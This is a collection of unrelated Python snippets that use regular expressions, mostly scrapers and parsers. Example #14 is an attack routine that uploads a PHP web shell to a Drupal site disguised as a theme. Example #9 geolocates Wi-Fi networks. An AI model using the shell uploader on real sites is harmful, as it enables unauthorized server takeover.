Example #1
def getCategoryUrl(site="",url=""):
    catDb = openTable(tableName=global_setting['catTable'])
    r = session.get(url)
    if not r.text:
        return False

    soup = BeautifulSoup(r.text)
    for level1 in soup.select('.classify_books'):
        curLevel1 = level1.select('.classify_title')[0].text
        curLevel1 = re.sub('\s', '', curLevel1)
        for level2 in level1.select('.classify_kind'):
            curLevel2 = level2.select('.classify_kind_name')[0].text
            curLevel2 = re.sub('\s', '', curLevel2)
            for level3 in level2.select('ul li a'):
                #curLevel3 = re.sub('\s', '', level3.text)
                curLevel3 =  level3.text.strip()
                curlUrl = level3['href']
                retFind = re.findall(r'\/cp(.*)\.html',curlUrl)
                if retFind:
                    curCatID = retFind[0]
                    catType = 'book'
                else:
                    retFind = re.findall(r'\/cid(.*)\.html',curlUrl)
                    if retFind:
                        curCatID = retFind[0]
                        catType = 'nonbook'
                if retFind:
                    if catDb.find({'catId':curCatID}).count() >0:
                        logger.debug('category %s exists, skip\n'%(curCatID))
                    else:
                        catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site})
    return True
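A hypothetical call; the site label and URL are illustrative, and openTable, session, global_setting and logger are assumed to be defined elsewhere in the module:

# getCategoryUrl(site='examplebooks', url='http://books.example.com/all-categories.html')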
Example #2
	def DownloadUpdate(self, file):
		self.log('Downloading: %s' % file)
		dirfile = os.path.join(self.UpdateTempDir,file)
		dirname, filename = os.path.split(dirfile)
		if not os.path.isdir(dirname):
			try:
				os.makedirs(dirname)
			except:
				self.log('Error creating directory: '  +dirname)
		url = self.SVNPathAddress+urllib.quote(file)
		try:
			if re.findall(".xbt",url):
				self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
				urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8"))
			else: urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8") )
			self.DownloadedFiles.append(urllib.unquote(url))
			return 1
		except:
			try:
				time.sleep(2)
				if re.findall(".xbt",url):
					self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
					urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
				else: urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8") )
				self.DownloadedFiles.append(urllib.unquote(url))
				return 1
			except:
				self.log("Download failed: %s" % url)
				self.DownloadFailedFiles.append(urllib.unquote(url))
				return 0
Example #3
def same_url(raw_url1, raw_url2):
    """Check if 2 URLs refer to the same primary resource

    `urltools.compare()` fails if the 2 URLs have different fragments.
    See issue #8 for details. The function treats a special case where
    the path is simply '/blog' to accommodate some blogs that refer to
    their posts via the fragment.

    Args:
        raw_url1 (str): First URL to be compared
        raw_url2 (str): Second URL to be compared

    Returns:
        bool: Whether the URLs are the same
    """
    arxiv_exception = 'arxiv.org'
    fragment_identifier = '#'

    url1 = _parse_url(raw_url1)
    url2 = _parse_url(raw_url2)

    # If it's on arxiv, do some acrobatics
    if url1['netloc'] == url2['netloc'] == arxiv_exception:
        regex = '([^/a-z]+\.[^/a-z.]+)'
        return re.findall(regex, url1['path']) == re.findall(regex, url2['path'])
    else:
        return urltools.compare(_normalize_url(raw_url1), _normalize_url(raw_url2))
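A brief usage sketch with hypothetical URLs; `_parse_url`, `_normalize_url` and `urltools` are assumed to be available in the surrounding module, with `_parse_url` exposing urlparse-style fields:

# same_url('https://arxiv.org/abs/1706.03762v1', 'https://arxiv.org/abs/1706.03762v2')
#   -> on arxiv.org only the dotted numeric id in the path ('1706.03762') is compared
# same_url('http://example.com/a', 'http://example.com/b')
#   -> falls through to urltools.compare() on the normalized URLs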
Example #4
def update_lyrics(request):  
    b = open('./artistList.txt', 'r') 
    bb = b.read()
    b.close() 
    bbb = bb.split(chr(10))

    for ar in bbb: 
        if ar.split('=')[1] == '1':
            return index(request)

        furl = "/"+ar.split('=')[1]+".htm"
        ar = ar.split('=')[0]
        artxt = ''
        
        #req = urllib2.Request(u"http://mojim.com/"+ar+".html?t1")
        #print "connected >> http://mojim.com/"+ar+".html?t1"
        #response = urllib2.urlopen(req) 
        #result = response.read()     
        print '--',furl,'--'

        if len(furl) > 0:           
            req2 = urllib2.Request("http://mojim.com"+furl) 


            response2 = urllib2.urlopen(req2)
            result2 = response2.read()     
            
            furl2 = re.findall('/tw[0-9x]*.htm', result2)
            iii = -1
            if len(furl2) > 0:        
                for furl3 in furl2: 
                    iii = iii + 1
                    if iii % 2 == 0: continue
                    try: 
                        req3 = urllib2.Request("http://mojim.com"+furl3) 
                        
                        response3 = urllib2.urlopen(req3)
                        result3 = response3.read()   
                        
                        lasturl = re.findall('<dl><dt><br /><br />[^^]*</div>', result3)
                        #a = raw_input()
                        artxt = lasturl[0].replace('更多更詳盡歌詞','').replace(u'在 ','').replace(u'Mojim.com','').replace(u'※','').replace('魔鏡歌詞網','')
  
                        aaaaaaaa = re.findall(u'title="歌詞(.*)">', artxt)  # song titles
                        bbbbbbbb = re.findall('<dd><br />(.*)</dd>', artxt)  # lyric blocks
     
                        bCnt = len(bbbbbbbb)
                        for bi in range(0, bCnt): 
                            if len(bbbbbbbb[bi]) > 22: 
                                lv = LyricsView()
                                ll = striphtml(bbbbbbbb[bi].encode('Shift_JIS').replace('<br />', '\r'))
                                ll = ll[:len(ll)-24]
                                lv.setParams({'artist':ar,'title':aaaaaaaa[bi],'lyrics':ll})
                                lv.save() 
                    except:
                        pass
        '''a = open(u''+ar+'.html', 'w')
        a.write(artxt)
        a.close()'''
    return index(request)
Example #5
def ident_author(name, pp=prompt_possibles):
    orig_name = name
    name = ''.join(re.findall('[A-Z0-9]+',name.upper()))
    best_authors = []
    with open('sample_data/author_names.json', 'r') as f:
        j = json.load(f)
        for b in j['results']['bindings']:
            author_orig = b['name']['value']
            uri = b['author']['value']
            author = b['name']['value'].upper()
            subnames = author_orig.split()
            author = ''.join(re.findall('[A-Z0-9]+',author))
            dist = jaccard_ngram_dist(name,author,3)
            best_authors.append(((author_orig,uri),dist))
            if len(subnames)>=2:
                for sname in [subnames[0], subnames[-1]]:
                    sname = ''.join(re.findall('[A-Z0-9]+',sname))
                    dist = jaccard_ngram_dist(name,sname,3)
                    best_authors.append(((author_orig,uri),dist))
            if len(best_authors)>20:
                best_authors.sort(key=lambda x:x[1])
                best_authors = best_authors[:5]
    best_authors.sort(key=lambda x:x[1])
    best_authors = best_authors[:5]
    best_dist = best_authors[0][1]
    possibles = [best_authors[0][0]]
    for author, dist in best_authors[1:]:
        percent_diff = (dist-best_dist)*2/float(dist+best_dist)
        if percent_diff < __CUTOFF__:
            possibles.append(author)
    if len(possibles)>1:
        identified = pp(orig_name, possibles)
    else:
        identified = possibles[0]
    return identified
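A hypothetical call (the JSON path is hard-coded above, and `jaccard_ngram_dist`, `prompt_possibles` and `__CUTOFF__` come from the surrounding module); it returns one of the candidate (author name, URI) pairs, or whatever prompt_possibles picks when several are close:

# author_name, author_uri = ident_author('j r r tolkien')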
Example #6
    def run_query(self, query):
        '''Run a query, returning the results as a list of dictionaries

        When unknown output is encountered, OsqueryUnknownException is thrown.
        When osqueryi returns an error, OsqueryException is thrown.
        '''
        query = query + ';'  # Extra semicolon causes no harm
        result = self.run_command(query)
        # On Mac, the query appears first in the string. Remove it if so.
        result = re.sub(re.escape(query), '', result).strip()
        result_lines = result.splitlines()

        if len(result_lines) < 1:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
        if result_lines[0].startswith(self.ERROR_PREFIX):
            raise OsqueryException(result_lines[0])

        try:
            header = result_lines[1]
            columns = re.findall('[^ |]+', header)
            rows = []
            for line in result_lines[3:-1]:
                values = re.findall('[^ |]+', line)
                rows.append(
                    dict((col, val) for col, val in zip(columns, values)))
            return rows
        except:
            raise OsqueryUnknownException(
                'Unexpected output:\n %s' % result_lines)
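For reference, the pretty-printed osqueryi output this parser expects looks roughly like the sketch below (values illustrative); the header line is split into column names with the same `re.findall('[^ |]+', ...)` call used above:

# +------+------+
# | name | pid  |
# +------+------+
# | bash | 1234 |
# +------+------+
# re.findall('[^ |]+', '| name | pid  |')  ->  ['name', 'pid']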
Example #7
def summary_up_result(result_file, ignore, row_head, column_mark):
    """
    Used to summarize monitoring results or other kinds of results. Currently it
    calculates the average value for each item in the results. It fits records
    that are in matrix form.

    @result_file: file with the results that need to be calculated
    @ignore: pattern for comments in the results which need to be thrown away
    @row_head: pattern for the items in a row
    @column_mark: pattern for the first line of the matrix, which is used to
    generate the items in a column
    Return: A dictionary with the average value of the results
    """
    head_flag = False
    result_dict = {}
    column_list = {}
    row_list = []
    fd = open(result_file, "r")
    for eachLine in fd:
        if len(re.findall(ignore, eachLine)) == 0:
            if len(re.findall(column_mark, eachLine)) != 0 and not head_flag:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[i] = {}
                        column_list[column] = i
                        column += 1
                head_flag = True
            elif len(re.findall(column_mark, eachLine)) == 0:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                row_flag = False
                for i in row_list:
                    if row == i:
                        row_flag = True
                if row_flag is False:
                    row_list.append(row)
                    for i in result_dict:
                        result_dict[i][row] = []
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[column_list[column]][row].append(i)
                        column += 1
    fd.close()
    # Calculate the average value
    average_list = {}
    for i in column_list:
        average_list[column_list[i]] = {}
        for j in row_list:
            average_list[column_list[i]][j] = {}
            check = result_dict[column_list[i]][j][0]
            if utils_misc.aton(check) or utils_misc.aton(check) == 0.0:
                count = 0
                for k in result_dict[column_list[i]][j]:
                    count += utils_misc.aton(k)
                average_list[column_list[i]][j] = "%.2f" % (count /
                                                            len(result_dict[column_list[i]][j]))

    return average_list
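A hypothetical call with illustrative file name and patterns; note that `row_head` is fed to `re.split()` and is expected to yield three parts, so it needs a capturing group:

# averages = summary_up_result('monitor.log', ignore=r'^#',
#                               row_head=r'^(\S+)\s+', column_mark=r'Device')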
Example #8
def weatherReport():
	htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
	htmltext = htmlfile.read()

	rnTemp =  '<span itemprop="temperature-fahrenheit">(.+?)</span>'
	conditions = '<div class="wx-phrase ">(.+?)</div>'
	tonightTemp = '<div class="wx-temperature">(.+?)</div>'

	rntPattern = re.compile(rnTemp)
	conditionsPattern = re.compile(conditions)
	tonightTempPattern = re.compile(tonightTemp)


	rntInstance = re.findall(rntPattern, htmltext)
	conditionsInstance = re.findall(conditionsPattern, htmltext)
	tonightTempInstance = re.findall(tonightTempPattern, htmltext)

	
	currentConditions = conditionsInstance[0]
	tonightConditions = conditionsInstance[2]
	currentTemp  = rntInstance[0]
	tonightTemp = tonightTempInstance[2][:2]
	print currentTemp

	to = ['*****@*****.**', '*****@*****.**']
	sender = 'weather.bot1'
	subject = 'Your Daily Weather Forecast is Here'
	bodymsg = "Right now: " + currentTemp +' degrees.' + '  '  + currentConditions + '.' + "\n"  +"Tonight: "  + \
			   tonightTemp + ' degrees.' + '  ' + tonightConditions + '.\n\n' + "Read more about today's weather here: "\
			   "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n"  + "This message was mad by request via WeatherBot.\nHave a great day."

	for address in to:
		createMessage(address, '*****@*****.**', 'skytower', subject, bodymsg)

	return
Example #9
def wigle_print(username, password, netid):
    browser = mechanize.Browser()

    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})

    browser.open('https://wigle.net//gps/gps/main/login', reqData)

    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()

    mapLat = 'N/A'
    mapLon = 'N/A'
    rLat = re.findall(r'maplat=.*\&', resp)
    rLon = re.findall(r'maplon=.*\&', resp)

    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]

    if rLon:
        mapLon = rLon[0].split('&')[0].split('=')[1]

    print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
Example #10
def _strip_and_unquote_list( keys, value ):
    if value[0] == '"':
        # double-quoted values
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        values = re.findall( _DQ_L_VALUE, value )
    elif value[0] == "'":
        # single-quoted values
        m = _SQV.match( value )
        if m:
            value = m.groups()[0]

        values = re.findall( _SQ_L_VALUE, value )
    else:
        # unquoted values
        # (may contain internal quoted strings with list delimiters inside 'em!)
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        else:
            n = _SQV.match( value )
            if n:
                value = n.groups()[0]

        values = list(_unquoted_list_parse( keys, value ))
        # allow trailing commas
        if values[-1] == '':
            values = values[0:-1]

    return values
Example #11
 def test_list(self):
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps_before = re.findall(r'([-_\w]+) {\w?}', child.before)
     # create a new app
     self.assertIsNotNone(self.formation)
     child = pexpect.spawn("{} apps:create --formation={}".format(
         DEIS, self.formation))
     child.expect('done, created ([-_\w]+)')
     app = child.match.group(1)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names contains the previous set
     self.assertLess(set(apps_before), set(apps))
     # delete the app
     child = pexpect.spawn("{} apps:destroy --app={} --confirm={}".format(
         DEIS, app, app))
     child.expect('done in ', timeout=5 * 60)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps:list".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names is equal to the original set
     self.assertEqual(set(apps_before), set(apps))
Example #12
def parse_cpu_time(time):
    # return the elapsed time in milliseconds
    # time may be '12m53s', or '0.01s'
    hour_match = re.findall(r'\d+h', time)
    minute_match = re.findall(r'\d+m', time)
    sec_match = re.findall(r'[0-9]+\.*[0-9]*s', time)

    if len(hour_match) == 0:
        hour = 0
    else:
        hour = int(hour_match[0][:-1])

    if len(minute_match) == 0:
        minute = 0
    else:
        minute = int(minute_match[0][:-1])

    if len(sec_match) == 0:
        sec = 0
    else:
        sec = float(sec_match[0][:-1])

    # Return time in units of ms (milliseconds)
    time_ret = int((sec + (minute * 60) + (hour * 3600)) * 1000)
    return time_ret
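Two quick sanity checks of the conversion above:

# parse_cpu_time('12m53s')  ->  (53 + 12 * 60) * 1000 = 773000
# parse_cpu_time('0.01s')   ->  10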
Example #13
    def __search(self, titles, year, season='0'):
        try:
            query = self.search_link % (urllib.quote_plus(titles[0]))
            query = urlparse.urljoin(self.base_link, query)

            t = [cleantitle.get(i) for i in set(titles) if i]
            y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

            r = client.request(query)

            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'list_movies'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'item_movie'})
            r = dom_parser.parse_dom(r, 'h2', attrs={'class': 'tit'})
            r = dom_parser.parse_dom(r, 'a', req='href')
            r = [(i.attrs['href'], i.content.lower()) for i in r if i]
            r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
            r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:\s*-?\s*(?:season|s))\s*(\d+)', i[1])) for i in r]
            r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], '1' if int(season) > 0 and i[3] == '0' else i[3]) for i in r]
            r = sorted(r, key=lambda i: int(i[2]), reverse=True)  # with year > no year
            r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y and int(i[3]) == int(season)][0]

            return source_utils.strip_domain(r)
        except:
            return
Example #14
def drupal_upload(url, login, pwd):
  print '[*] Trying to install theme with shell.'
  dpl_sess = drupal_admin(url, login, pwd)
  info = 'name = '+globals.SHELL_NAME+'\ndescription = '+globals.SHELL_NAME+'\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = '+globals.SHELL_EXT
  page = dpl_sess.get(url+"?q=admin/appearance/install")
  token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />',page.text)
  token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />',page.text)
  if (token1 == []) or (token2 == []):
    print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.'
    sys.exit()
  post = {'form_build_id' : str(token1[0]),
          'form_token' : str(token2[0]),
          'form_id' : 'update_manager_install_form',
          'op' : 'Install'}
  print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
  arch = zipfile.ZipFile(globals.SHELL_NAME+".zip", 'w')
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_EXT, globals.PHP_EXEC)
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_NAME+".info",info)
  arch.close()
  file = {'files[project_upload]' : (globals.SHELL_NAME+".zip",open(globals.SHELL_NAME+".zip",'rb'),'application/zip')}
  print '[*] Trying to upload zip file.'
  up = dpl_sess.post(url+"?q=admin/appearance/install",files=file,data=post,timeout=None)
  get_link = re.findall('URL=(.*?)" />',up.text)
  if not get_link:
    print '[-] Failed to upload zip file. Try one more time.'
    sys.exit()
  link = str(get_link[0]).replace('&amp;','&')
  dpl_sess.get(link)
  shell = url+"sites/all/themes/"+globals.SHELL_NAME+"/"+globals.SHELL_EXT
  check = dpl_sess.get(shell)
  if check.status_code == 200:
    return shell
  else:
    print '[-] Themes or tmp directories are not writable.'
    sys.exit()
Example #15
def __load_testdata(file):
   """
   Reads the testdata out of a file.  Testdata consists of exactly three 
   strings on each line, each one enclosed in quotation marks (" or ').  
   The first is the filename to be parsed, the second is the series name
   that should be parsed out of it, and the third is the issue number string
   that should be parsed out of it.
   
   Blank lines and lines that begin with # are ignored.
   """
   retval = []
   if File.Exists(file): 
      with StreamReader(file, Encoding.UTF8, False) as sr:
         line = sr.ReadLine()
         while line is not None:
            line = line.strip()
            if len(line) > 0 and not line.startswith("#"):
               if line.startswith('"'):
                  data = re.findall(r'"(.*?)"', line)
               else:
                  data = re.findall(r"'(.*?)'", line)
               if len(data) == 3:
                  data.append("")
               if len(data) != 4:
                  raise Exception("badly formatted test data");
               retval.append( data ) 
            line = sr.ReadLine()
   return retval
Example #16
def process_line_exceptions(line, extra_tags):
    global except_base_tag

    if not ' ' in line or re.match('.*[а-яіїєґ]/.*', line):
      return line
    if re.match('^[^ ]+ [^ ]+ [^:]?[a-z].*$', line):
      return line

    if line.startswith('# !'):
      except_base_tag = re.findall('![a-z:-]+', line)[0][1:] + ':'
      return ''
    
    base = re.findall('^[^ ]+', line)[0]
    
    except_base_tag2 = except_base_tag
    if base.endswith('ся'):
        except_base_tag2 = except_base_tag.replace('verb:', 'verb:rev:')
      
    out_line = re.sub('([^ ]+) ?', '\\1 ' + base + ' ' + except_base_tag2 + 'unknown' + extra_tags + '\n', line)
    
    if except_base_tag in ('verb:imperf:', 'verb:perf:'):
      base_add = 'inf:'
#      if base.endswith('ся'):
#        base_add = 'rev:' + base_add
      out_line = re.sub("(verb:(?:rev:)?)((im)?perf:)", "\\1inf:\\2", out_line, 1)
      
      out_lines = out_line.split('\n')
      out_lines[0] = out_lines[0].replace(':unknown', '')
      out_line = '\n'.join(out_lines)
    
    return out_line[:-1]
Example #17
    def get_episode(self,url):
        html = self.fetch_url(url)
        divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html) 
        result = []
        if divs:
            for div in divs:
                # capture groups: link URL, episode ("第N集"), subtitle
                r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])

                if r:     # TV series
                    for ep_data in r:
                        result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0]})
                                        
                else: 
                    
                    # capture groups: link URL, title, subtitle, issue number (date)
                    r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
                    if r:  # variety show
                        for ep_data in r:
                            dateA = ep_data[3].split("-")
                            date = ""
                            if len(dateA) == 3:  #2012-08-12
                                date = "%s.%s.%s" % (dateA[2],dateA[1],dateA[0])
                            result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0],
                                        "date":date})
        return result           
             
#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
Example #18
def LISTSHOWS(murl,channel,index=False):
    link=main.OPENURL(murl)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<div class="titleline"><h2 class="forumtitle"><a href="(.+?)">(.+?)</a></h2></div>',link)
    label='TV Shows'
    if not len(match) > 0:
        match = re.findall('<h3 class="threadtitle">.+?<a class=".+?" href="(.+?)" id=".+?">(.+?)</a></h3>', link)
        label = 'Movies'
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ' + label + ' Show list is cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "color" in name:
            name=name.replace('<b><font color=red>','[COLOR red]').replace('</font></b>','[/COLOR]')
            name=name.replace('<b><font color="red">','[COLOR red]').replace('</font></b>','[/COLOR]')
        if label == 'Movies':
            main.addDirX(name, MainUrl+url,39,'',searchMeta=True, metaType='Movies')
        else:
            main.addTVInfo(name,MainUrl+url,38,getShowImage(channel,name),'','')
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), label)
    main.VIEWS()
Example #19
def LISTEPISODES(tvshowname,url):
    link=main.OPENURL(url)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<a class=".+?" href="(.+?)" id=".+?">(.+?)</a>',link)
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ['+tvshowname+'] Episodes are cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "Online" not in name: continue
        name=name.replace(tvshowname,'').replace('Watch Online','')
        name=main.removeNonASCII(name)
        main.addTVInfo(name,MainUrl+url,39,'','','') 
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    match=re.findall('<div id="above_threadlist" class="above_threadlist">(.+?)</div>',link)
    for string in match:
        match1=re.findall('<a href="(.+?)" title="(.+?)">[0-9]+</a>', string)
        for url, page in match1:
            main.addTVInfo(page,MainUrl+url,38,'','','')
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), 'TV Shows')
    main.VIEWS()
Example #20
def memory(inp):
    """memory -- Displays the bot's current memory usage."""
    if os.name == "posix":
        # get process info
        status_file = open('/proc/self/status').read()
        s = dict(re.findall(r'^(\w+):\s*(.*)\s*$', status_file, re.M))
        # get the data we need and process it
        data = s['VmRSS'], s['VmSize'], s['VmPeak'], s['VmStk'], s['VmData']
        data = [float(i.replace(' kB', '')) for i in data]
        strings = [convert_kilobytes(i) for i in data]
        # prepare the output
        out = "Threads: \x02{}\x02, Real Memory: \x02{}\x02, Allocated Memory: \x02{}\x02, Peak " \
              "Allocated Memory: \x02{}\x02, Stack Size: \x02{}\x02, Heap " \
              "Size: \x02{}\x02".format(s['Threads'], strings[0], strings[1], strings[2],
              strings[3], strings[4])
        # return output
        return out

    elif os.name == "nt":
        cmd = 'tasklist /FI "PID eq %s" /FO CSV /NH' % os.getpid()
        out = os.popen(cmd).read()
        memory = 0
        for amount in re.findall(r'([,0-9]+) K', out):
            memory += float(amount.replace(',', ''))
        memory = convert_kilobytes(memory)
        return "Memory Usage: \x02{}\x02".format(memory)

    else:
        return "Sorry, this command is not supported on your OS."
Example #21
def compile_formula(formula, verbose=False):
    """Compile formula into a function. Also return letters found, as a str,
    in same order as parms of function. The first digit of a multi-digit 
    number can't be 0. So if YOU is a word in the formula, and the function
    is called with Y eqal to 0, the function should return False."""

    # modify the code in this function.

    letters = ''.join(set(re.findall('[A-Z]', formula)))
    print letters
    first_letters = set(re.findall('([A-Z])[A-Z]', formula))
    print first_letters
    checklist = ['%s!=0' % (w) for w in first_letters]
    checklist.append('1==1')
    print checklist
    check = ' and '.join(checklist)
    print check
    parms = ', '.join(letters)
    print parms
    tokens = map(compile_word, re.split('([A-Z]+)', formula))
    print tokens
    body = ''.join(tokens)
    print body
    f = 'lambda %s: %s and (%s)' % (parms, body, check)
    if verbose: print f
    return eval(f), letters
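A small worked example; the formula is illustrative and `compile_word` comes from the surrounding module:

# f, letters = compile_formula('YOU == ME**2')
# first_letters is {'Y', 'M'} here, so the generated lambda guards Y != 0 and M != 0
# (plus the always-true '1==1') before evaluating the compiled body.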
Example #22
def parse_current_docket(docket_record):
    # grab the file with the URL mangled slightly to grab 100k records
    docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
    page = pq(etree.fromstring(docket_file, parser))

    docket = dict(docket_record)

    docket['title'] = page('.dyn_wrap h1').text().strip()
    assert docket['title'], 'no title found'

    headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]

    docket['comments'] = []

    # check if there's a no-records message
    if len(page('.rgMasterTable .rgNoRecords')):
        return docket
    
    for row in page('.rgMasterTable tbody tr').items():
        tds = row.find('td')
        cell_text = [item.text().strip() for item in tds.items()]
        cdata = dict(zip(headers, cell_text))
        
        link = pq(tds[-1]).find('a')

        doc = {
            'url': urlparse.urljoin(docket['url'], link.attr('href')),
            'details': {},
            'release': [fix_spaces(cdata['Release'])],
            'date': cdata['Date Received'],
            'doctype': 'public_submission',
        }

        vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
        if vc_matches:
            doc['id'] = vc_matches[0]
            doc['subtype'] = 'comment'
            detail_columns = ['Organization', 'First Name', 'Last Name']
        else:
            ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
            if ep_matches:
                doc['id'] = "EP-%s" % ep_matches[0]
                doc['subtype'] = 'exparte'
                detail_columns = ['Organization']
            else:
                assert False, "expected either comment or exparte link: %s" % doc['url']

        for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
            if cftc_label in detail_columns and cdata[cftc_label]:
                doc['details'][rdg_label] = cdata[cftc_label]

        docket['comments'].append(doc)

    assert len(docket['comments']) < 100000, "we probably exceeded one page"

    # then strip out all the ones that aren't about this document
    release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
    docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]

    return docket
Example #23
 def extractSrcFileData(self, path):
     fileinput.close()
     isLocListener = False
     wakeLockAcqRegex = "invoke-virtual(.*?)Landroid/os/PowerManager$WakeLock;->acquire()"
     domRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder()"
     saxRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser()"
     xmlppRegex = "invoke-static(.*?)Landroid/util/Xml;->newPullParser()"
     for line in fileinput.input([path]):
         matches = re.findall(wakeLockAcqRegex, line)
         if len(matches) > 0:
             self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
         if line.startswith(".implements Landroid/location/LocationListener;"):
             self.numLocListeners = self.numLocListeners + 1
             isLocListener = True
         if isLocListener:
             if "\"gps\"" in line:
                 self.numGpsUses = self. numGpsUses + 1
         matches = re.findall(domRegex, line)
         if len(matches) > 0:
             self.numDomParser = self.numDomParser + 1
         matches = re.findall(saxRegex, line)
         if len(matches) > 0:
             self.numSaxParser = self.numSaxParser + 1
         matches = re.findall(xmlppRegex, line)
         if len(matches) > 0:
             self.numXMLPullParser = self.numXMLPullParser + 1
Example #24
    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        title = self._html_search_meta('title', webpage, 'title', fatal=True)
        TITLE_SUFFIX = ' - TeacherTube'
        if title.endswith(TITLE_SUFFIX):
            title = title[:-len(TITLE_SUFFIX)].strip()

        description = self._html_search_meta('description', webpage, 'description')
        if description:
            description = description.strip()

        quality = qualities(['mp3', 'flv', 'mp4'])

        media_urls = re.findall(r'data-contenturl="([^"]+)"', webpage)
